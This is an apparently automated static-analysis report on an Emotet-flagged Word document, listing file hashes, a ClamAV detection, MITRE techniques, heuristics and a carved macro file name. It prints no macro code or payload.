Emotet — Office (OLE) / .DOC malware analysis

Static analysis result for SHA-256 bbe0ecfae4eea9b7…

MALICIOUS

Office (OLE) / .DOC

146.0 KB Created: 2020-08-19 22:16:00 Authoring application: Microsoft Office Word
MD5: 364f32d43803c1d3815c1efb8df7ea85 SHA-1: 33acabca62460f699e301116010f579192dbcc9b SHA-256: bbe0ecfae4eea9b798676c8a898b034bfbc63c712e83dbc0338dc793c7490fe9
68 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file was detected by ClamAV as 'Doc.Dropper.EmotetIOS-9402070-0', a signature strongly associated with the Emotet malware family. Although the VBA project contains no executable statements, the detection indicates the file's structure or embedded components are indicative of Emotet's dropper functionality. This suggests the document is designed to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Dropper.EmotetIOS-9402070-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
  • VBA project contains no executable statements low OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
4f4a8b88fb3d1d9eb3a7ed29a68af2564ed92b1e830633b4ccac03177a7beeca		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 727 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.